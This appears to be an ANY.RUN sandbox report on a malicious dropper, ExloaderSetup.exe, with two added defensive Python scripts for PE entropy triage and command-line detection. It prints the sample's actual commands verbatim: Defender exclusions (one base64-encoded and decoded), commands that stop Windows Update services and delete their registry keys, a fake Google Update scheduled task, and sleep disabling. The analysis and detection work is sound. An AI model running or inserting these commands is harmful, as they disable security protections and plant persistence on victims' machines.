File name: ExloaderSetup.exe

Full analysis: https://app.any.run/tasks/c523a187-bd85-45d5-b4b3-1a6872a41466
Verdict: Malicious activity
Analysis date: April 01, 2023, 01:20:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5: 60F4D01E21F14E48AF9F2024D5A7AD59
SHA1: FD60ACE5FEEA5D813DEEBC007C0E1933931982C5
SHA256: 161C8B407D317897A6F55A2812EECBB1FE4E999156AE666933C9999F602AB81C
SSDEEP: 393216:VYvVgx3oBkGQsA33cmlCcUEGxkeq/OzxMpBt7sZxYL3of4m46:VwVgp6kGQfHcmlh6Keq/gMtQZxMo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Exloader.exe (PID: 2604)
      • updater.exe (PID: 2572)
      • ExLoader_Installer.exe (PID: 2848)
      • ExLoader_Installer.exe (PID: 2100)
    • Uses Task Scheduler to autorun other applications

      • powershell.exe (PID: 2596)
      • powershell.exe (PID: 2536)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 3036)
    • Runs injected code in another process

      • powershell.EXE (PID: 2164)
    • Creates a writable file in the system directory

      • powershell.exe (PID: 2416)
      • powershell.EXE (PID: 2200)
    • Application was injected by another process

      • dllhost.exe (PID: 2692)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • ExloaderSetup.exe (PID: 624)
      • Exloader.exe (PID: 2604)
      • updater.exe (PID: 2572)
    • BASE64 encoded PowerShell command has been detected

      • ExloaderSetup.exe (PID: 624)
    • Base64-obfuscated command line is found

      • ExloaderSetup.exe (PID: 624)
    • Reads the Internet Settings

      • ExloaderSetup.exe (PID: 624)
      • powershell.exe (PID: 2636)
      • ExLoader_Installer.exe (PID: 2100)
    • Executable content was dropped or overwritten

      • ExloaderSetup.exe (PID: 624)
      • ExLoader_Installer.exe (PID: 2100)
      • Exloader.exe (PID: 2604)
      • updater.exe (PID: 2572)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2264)
    • Uses powercfg.exe to modify the power settings

      • cmd.exe (PID: 2548)
      • cmd.exe (PID: 2368)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 2532)
      • cmd.exe (PID: 2564)
    • Uses REG/REGEDIT.EXE to modify the registry

      • cmd.exe (PID: 2532)
      • cmd.exe (PID: 2564)
    • The process checks if current user has admin rights

      • Exloader.exe (PID: 2604)
      • updater.exe (PID: 2572)
    • Starts CMD.EXE for commands execution

      • Exloader.exe (PID: 2604)
      • ExLoader_Installer.exe (PID: 2848)
    • The process executes via Task Scheduler

      • updater.exe (PID: 2572)
      • powershell.EXE (PID: 2164)
      • powershell.EXE (PID: 2200)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2264)
      • ExLoader_Installer.exe (PID: 2848)
      • dialer.exe (PID: 2796)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 2472)
    • Drops a system driver (possible attempt to evade defenses)

      • updater.exe (PID: 2572)
    • Unusual connection from system programs

      • powershell.exe (PID: 2416)
    • Connects to unusual port

      • dialer.exe (PID: 2796)
  • INFO

    • Reads the computer name

      • ExloaderSetup.exe (PID: 624)
      • ExLoader_Installer.exe (PID: 2100)
      • ExLoader_Installer.exe (PID: 2848)
    • Checks supported languages

      • ExloaderSetup.exe (PID: 624)
      • Exloader.exe (PID: 2604)
      • ExLoader_Installer.exe (PID: 2100)
      • updater.exe (PID: 2572)
      • ExLoader_Installer.exe (PID: 2848)
    • The process checks LSA protection

      • ExloaderSetup.exe (PID: 624)
      • powershell.exe (PID: 2264)
      • powershell.exe (PID: 2636)
      • powershell.exe (PID: 2596)
      • dialer.exe (PID: 3044)
      • powershell.exe (PID: 3036)
      • ExLoader_Installer.exe (PID: 2100)
      • ExLoader_Installer.exe (PID: 2848)
      • powershell.EXE (PID: 2164)
      • powershell.exe (PID: 2416)
      • powershell.exe (PID: 2536)
      • dllhost.exe (PID: 2692)
      • powershell.EXE (PID: 2200)
      • WMIC.exe (PID: 2452)
      • dialer.exe (PID: 2796)
    • Manual execution by a user

      • powershell.exe (PID: 2636)
      • powershell.exe (PID: 2596)
      • cmd.exe (PID: 2548)
      • cmd.exe (PID: 2532)
      • dialer.exe (PID: 3044)
      • powershell.exe (PID: 2416)
      • cmd.exe (PID: 2564)
      • cmd.exe (PID: 2368)
      • cmd.exe (PID: 2852)
      • cmd.exe (PID: 2472)
      • dialer.exe (PID: 1508)
      • dialer.exe (PID: 2796)
    • Create files in a temporary directory

      • ExloaderSetup.exe (PID: 624)
      • powershell.exe (PID: 2636)
      • powershell.exe (PID: 2596)
      • powershell.exe (PID: 2264)
      • Exloader.exe (PID: 2604)
      • powershell.exe (PID: 3036)
      • ExLoader_Installer.exe (PID: 2100)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2636)
      • powershell.exe (PID: 2416)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2636)
      • powershell.exe (PID: 2596)
      • powershell.exe (PID: 3036)
    • Creates files in the program directory

      • Exloader.exe (PID: 2604)
      • cmd.exe (PID: 2472)
      • updater.exe (PID: 2572)
    • Process checks computer location settings

      • ExLoader_Installer.exe (PID: 2848)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (42.6)
.exe | Win16/32 Executable Delphi generic (19.5)
.exe | Generic Win/DOS Executable (18.9)
.exe | DOS Executable Generic (18.9)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: -
OSVersion: 4
EntryPoint: 0x14d1
UninitializedDataSize: -
InitializedDataSize: 19866624
CodeSize: 2048
LinkerVersion: 6
PEType: PE32
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
TimeStamp: 0000:00:00 00:00:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 01-Jan-1970 00:00:00
Detected languages:
  • English - United States

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 4
Time date stamp: 01-Jan-1970 00:00:00
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_DEBUG_STRIPPED
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name    Virtual Address  Virtual Size  Raw Size    Characteristics                                                            Entropy
.text   0x00001000       0x00000668    0x00000800  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ              4.63988
.rdata  0x00002000       0x012DE3A3    0x012DE400  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ                         7.99907
.bss    0x012E1000       0x00000004    0x00000000  IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE  0
.rsrc   0x012E2000       0x00013E40    0x00014000  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ                         6.08668

Note: .text holds 0x800 bytes of code while .rdata holds 0x012DE400 bytes (about 19.8 MB) at entropy 7.999, and the link timestamp is zeroed. ExloaderSetup.exe is therefore a small stub carrying a compressed or encrypted payload; at runtime it drops Exloader.exe and ExLoader_Installer.exe (see Dropped files).
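The layout in the Sections table (a few hundred bytes of code next to a multi-megabyte data section at entropy close to 8, with a zeroed timestamp) is what a static triage script should key on before any detonation. The following is an added example, not code from ANY.RUN or from the report: it builds a constructed, non-loadable PE image that imitates that layout, parses the section table with the standard library only, computes per-section Shannon entropy and applies three heuristics. The section names and sizes, the `pseudo_random` filler, and the thresholds in `triage` are assumptions chosen for the demo.

```python
import hashlib
import math
import struct

# Section flags from winnt.h (the same names the report prints)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, close to 8.0 for random data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe_sections(image: bytes):
    """Follow DOS header -> PE signature -> COFF header -> section table.
    Returns (TimeDateStamp, list of section dicts) or raises ValueError."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    _machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    table = coff + 20 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, table + i * 40)
        raw = image[rawptr:rawptr + rawsize] if rawsize else b""
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": vaddr, "virtual_size": vsize,
                         "raw_size": rawsize, "characteristics": chars,
                         "entropy": shannon_entropy(raw)})
    return timestamp, sections


def triage(timestamp: int, sections: list) -> list:
    """Heuristics (thresholds are assumptions) that fire on the layout in the report."""
    findings = []
    if timestamp == 0:
        findings.append("TimeDateStamp is zero: build time scrubbed")
    code = [s for s in sections if s["characteristics"] & IMAGE_SCN_CNT_CODE]
    data = [s for s in sections if s["characteristics"] & IMAGE_SCN_CNT_INITIALIZED_DATA]
    for s in data:
        if s["entropy"] > 7.9 and s["raw_size"] >= 64 * 1024:
            findings.append(f"{s['name']}: entropy {s['entropy']:.3f} over {s['raw_size']} bytes, "
                            "looks compressed or encrypted")
    code_bytes = sum(s["raw_size"] for s in code)
    data_bytes = sum(s["raw_size"] for s in data)
    if code and data_bytes > 100 * code_bytes:
        findings.append(f"{code_bytes} bytes of code vs {data_bytes} bytes of data: stub loader")
    return findings


def pseudo_random(n: int, seed: bytes = b"constructed-demo-seed") -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for a packed payload."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_synthetic_pe(payload: bytes, code: bytes, timestamp: int = 0) -> bytes:
    """Constructed sample: just enough of a PE for the parser (MZ stub, COFF header,
    a zeroed 0xE0-byte optional header, .text and .rdata). It is not loadable."""
    e_lfanew, opt_size, align = 0x80, 0xE0, 0x200
    text_raw = (len(code) + align - 1) & ~(align - 1)
    headers_end = e_lfanew + 4 + 20 + opt_size + 2 * 40
    text_off = (headers_end + align - 1) & ~(align - 1)
    rdata_off = text_off + text_raw
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, 2, timestamp, 0, 0, opt_size, 0x0102)

    def hdr(name, vaddr, vsize, rawsize, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)

    headers = (dos + b"PE\0\0" + coff + b"\0" * opt_size
               + hdr(b".text", 0x1000, len(code), text_raw, text_off,
                     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
               + hdr(b".rdata", 0x2000, len(payload), len(payload), rdata_off,
                     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ))
    return headers.ljust(text_off, b"\0") + code.ljust(text_raw, b"\0") + payload


def analyse(image: bytes):
    timestamp, sections = parse_pe_sections(image)
    return timestamp, sections, triage(timestamp, sections)


if __name__ == "__main__":
    stub_code = bytes(range(64)) * 25 + b"\xcc" * 40        # 0x668 bytes, like the report's .text
    image = build_synthetic_pe(pseudo_random(256 * 1024), stub_code)
    ts, secs, findings = analyse(image)
    for s in secs:
        print(f"{s['name']:<7} VA=0x{s['virtual_address']:08X} raw=0x{s['raw_size']:08X} "
              f"entropy={s['entropy']:.5f}")
    for f in findings:
        print("!", f)
```

Entropy alone is not a verdict (legitimate installers and any file carrying compressed resources score high too); the code-to-data imbalance and the scrubbed timestamp are what turn it into a "detonate this" signal, which is the combination the report's own Sections and PE Headers blocks show.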

Resources

Title  Entropy  Size   Codepage  Language                 Type
1      4.88522  675    UNKNOWN   English - United States  RT_MANIFEST
2      2.20934  296    UNKNOWN   English - United States  RT_ICON
3      4.09612  3752   UNKNOWN   English - United States  RT_ICON
4      4.63458  2216   UNKNOWN   English - United States  RT_ICON
5      4.69609  1384   UNKNOWN   English - United States  RT_ICON
6      7.94794  28488  UNKNOWN   English - United States  RT_ICON
7      3.88767  16936  UNKNOWN   English - United States  RT_ICON
8      3.94179  9640   UNKNOWN   English - United States  RT_ICON
9      3.98176  6760   UNKNOWN   English - United States  RT_ICON
10     3.97877  4264   UNKNOWN   English - United States  RT_ICON

Imports

kernel32.dll
msvcrt.dll
shell32.dll
No data.
All screenshots are available in the full report
Total processes: 119
Monitored processes: 64
Malicious processes: 10
Suspicious processes: 3

Behavior graph

(Interactive graph, available in the full report.) Processes in the graph: exloadersetup.exe, powershell.exe, exloader.exe, exloader_installer.exe, cmd.exe, sc.exe, powercfg.exe, reg.exe, schtasks.exe, dialer.exe, choice.exe, updater.exe, dllhost.exe, wmic.exe. Edge types shown: start, drop and start, inject.

Process information

PID 2000  "C:\Users\admin\AppData\Local\Temp\ExloaderSetup.exe"
  Path: C:\Users\admin\AppData\Local\Temp\ExloaderSetup.exe
  Parent process: explorer.exe
  User: admin
  Integrity level: MEDIUM
  Exit code: 3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED; the same binary then runs at HIGH integrity as PID 624)
  Images: c:\users\admin\appdata\local\temp\exloadersetup.exe, c:\windows\system32\ntdll.dll, c:\windows\syswow64\ntdll.dll

PID 624  "C:\Users\admin\AppData\Local\Temp\ExloaderSetup.exe"
  Path: C:\Users\admin\AppData\Local\Temp\ExloaderSetup.exe
  Parent process: explorer.exe
  User: admin
  Integrity level: HIGH
  Exit code: 0
  Images: c:\users\admin\appdata\local\temp\exloadersetup.exe, c:\windows\syswow64\ntdll.dll, c:\windows\system32\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\system32\wow64win.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\user32.dll, c:\windows\system32\wow64cpu.dll, c:\windows\syswow64\kernel32.dll, c:\windows\syswow64\kernelbase.dll

PID 2264  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYwBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAeAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAeAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAZAB3ACMAPgA="
  Decoded (the argument is base64 over UTF-16LE text): <#fck#>Add-MpPreference <#dxy#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#cxx#> -Force <#idw#>
  The <#...#> block comments are filler that changes the encoded string without changing what runs; the command excludes the whole user profile and the system drive from Microsoft Defender scanning.
  Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Parent process: ExloaderSetup.exe
  User: admin
  Company: Microsoft Corporation
  Description: Windows PowerShell
  Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
  Integrity level: HIGH
  Exit code: 1
  Images: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\system32\wow64win.dll, c:\windows\system32\kernel32.dll, c:\windows\syswow64\ntdll.dll, c:\windows\syswow64\kernel32.dll, c:\windows\system32\wow64cpu.dll, c:\windows\system32\user32.dll, c:\windows\syswow64\kernelbase.dll

PID 2604  "C:\Users\admin\AppData\Local\Temp\Exloader.exe"
  Path: C:\Users\admin\AppData\Local\Temp\Exloader.exe
  Parent process: ExloaderSetup.exe
  User: admin
  Integrity level: HIGH
  Exit code: 0
  Images: c:\users\admin\appdata\local\temp\exloader.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcrt.dll

PID 2636  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Description: Windows PowerShell
  Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
  Integrity level: HIGH
  Exit code: 1
  Images: c:\windows\system32\windowspowershell\v1.0\powershell.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\user32.dll, c:\windows\system32\atl.dll

PID 2100  "C:\Users\admin\AppData\Local\Temp\ExLoader_Installer.exe"
  Path: C:\Users\admin\AppData\Local\Temp\ExLoader_Installer.exe
  Parent process: ExloaderSetup.exe
  User: admin
  Integrity level: HIGH
  Images: c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\users\admin\appdata\local\temp\exloader_installer.exe, c:\windows\system32\kernelbase.dll, c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll, c:\windows\system32\user32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\lpk.dll, c:\windows\system32\usp10.dll, c:\windows\system32\gdi32.dll

PID 2532  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  (Stops Windows Update, the update medic service, BITS and the delivery optimization service, then deletes their service keys so they cannot be restarted.)
  Path: C:\Windows\System32\cmd.exe
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Description: Windows Command Processor
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
  Integrity level: HIGH
  Exit code: 1
  Images: c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\user32.dll, c:\windows\system32\winbrand.dll, c:\windows\system32\gdi32.dll, c:\windows\system32\usp10.dll, c:\windows\system32\lpk.dll

PID 2548  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  (Disables sleep and hibernation on both AC and battery so the machine stays awake.)
  Path: C:\Windows\System32\cmd.exe
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Description: Windows Command Processor
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
  Integrity level: HIGH
  Exit code: 0
  Images: c:\windows\system32\cmd.exe, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\ntdll.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\winbrand.dll, c:\windows\system32\user32.dll, c:\windows\system32\gdi32.dll, c:\windows\system32\lpk.dll, c:\windows\system32\usp10.dll

PID 2596  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wqzjlkpym#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  (Persistence for the dropped updater.exe under a name that imitates Google Update: when elevated it registers a SYSTEM scheduled task, using schtasks.exe on Windows older than 6.2 (this Windows 7 guest) and Register-ScheduledTask otherwise; when not elevated it falls back to an HKCU Run key.)
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Description: Windows PowerShell
  Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
  Integrity level: HIGH
  Exit code: 0
  Images: c:\windows\system32\windowspowershell\v1.0\powershell.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\sechost.dll, c:\windows\system32\user32.dll, c:\windows\system32\gdi32.dll

PID 2080  sc stop UsoSvc
  Path: C:\Windows\System32\sc.exe
  Parent process: cmd.exe
  User: admin
  Company: Microsoft Corporation
  Description: A tool to aid in developing services for WindowsNT
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)
  Integrity level: HIGH
  Exit code: 1060 (ERROR_SERVICE_DOES_NOT_EXIST; UsoSvc is not present on Windows 7)
  Images: c:\windows\system32\sc.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll
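The command lines above carry the whole story of this sample (Defender exclusions, update services killed, a fake Google Update task, sleep disabled), but two of them need normalising before any rule can match: the -EncodedCommand argument must be base64-decoded as UTF-16LE, and the `<#...#>` block comments sprinkled through both PowerShell invocations must be stripped. The following is an added example, not code from ANY.RUN or from the sample: the command lines are a constructed set shortened from the Process information entries (the encoded value is the one the report shows for PID 2264), the rule names and ATT&CK mappings are the editor's, and the prefix list in `ENCODED_RE` covers only the common spellings of -EncodedCommand (PowerShell accepts any unambiguous prefix).

```python
import base64
import re

# Constructed sample, shortened from the report's Process information entries.
SAMPLE_CMDLINES = {
    2264: ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -EncodedCommand '
           '"PAAjAGYAYwBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAeAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAeAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAZAB3ACMAPgA="'),
    2636: r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force',
    2532: (r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc '
           r'& reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f'),
    2548: r'C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -standby-timeout-ac 0',
    2596: (r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wqzjlkpym#> IF((New-Object Security.Principal.WindowsPrincipal("""
           r"""[Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) """
           r"""{ schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } """
           r"""Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }"""),
}

# Common spellings only; PowerShell also accepts other unambiguous prefixes of -EncodedCommand.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+[\"']?([A-Za-z0-9+/=]{16,})", re.I)
BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.S)

# (rule name, pattern over the normalised command line); ATT&CK IDs are the editor's mapping
RULES = [
    ("T1562.001 Defender exclusion added",
     re.compile(r"Add-MpPreference\b.*-ExclusionPath", re.I | re.S)),
    ("T1562.001 Windows Update/BITS services stopped",
     re.compile(r"\bsc\s+stop\s+(?:UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I)),
    ("T1562.001 service registry keys deleted",
     re.compile(r'\breg\s+delete\s+"?HKLM\\SYSTEM\\CurrentControlSet\\Services\\', re.I)),
    ("T1053.005 scheduled task posing as Google Update",
     re.compile(r"(?:schtasks\s+/create|Register-ScheduledTask).*GoogleUpdateTaskMachine", re.I | re.S)),
    ("T1547.001 Run key fallback when not elevated",
     re.compile(r'\breg\s+add\s+"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"', re.I)),
    ("T1653 sleep/hibernate disabled so the miner keeps running",
     re.compile(r"\bpowercfg\s+/x\s+-(?:hibernate|standby)-timeout", re.I)),
]


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none.
    The argument is base64 over UTF-16LE text, never UTF-8."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def normalise(cmdline: str) -> str:
    """Decode, drop <# ... #> junk comments and collapse whitespace before matching."""
    text = decode_encoded_command(cmdline)
    if text is None:
        text = cmdline
    text = BLOCK_COMMENT_RE.sub(" ", text)
    return " ".join(text.split())


def triage(cmdlines: dict) -> dict:
    """Map PID -> {'normalised': str, 'hits': [rule names in RULES order]}."""
    out = {}
    for pid, cmd in cmdlines.items():
        text = normalise(cmd)
        out[pid] = {"normalised": text, "hits": [name for name, rx in RULES if rx.search(text)]}
    return out


if __name__ == "__main__":
    for pid, r in triage(SAMPLE_CMDLINES).items():
        print(f"PID {pid}: {r['normalised'][:90]}")
        for h in r["hits"]:
            print("   !", h)
```

Matching on the normalised text is what makes the two Add-MpPreference launches (one encoded with junk comments, one in the clear) hit the same rule; a rule written against the raw command line would see only the plain-text variant. The same normalisation belongs in front of any Sigma or EDR rule that keys on PowerShell arguments.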
Total events: 20 582
Read events: 20 412
Write events: 156
Delete events: 14

Modification events

PID 624 ExloaderSetup.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass = 1
PID 624 ExloaderSetup.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName = 1
PID 624 ExloaderSetup.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet = 1
PID 624 ExloaderSetup.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect = 0
PID 2636 powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass = 1
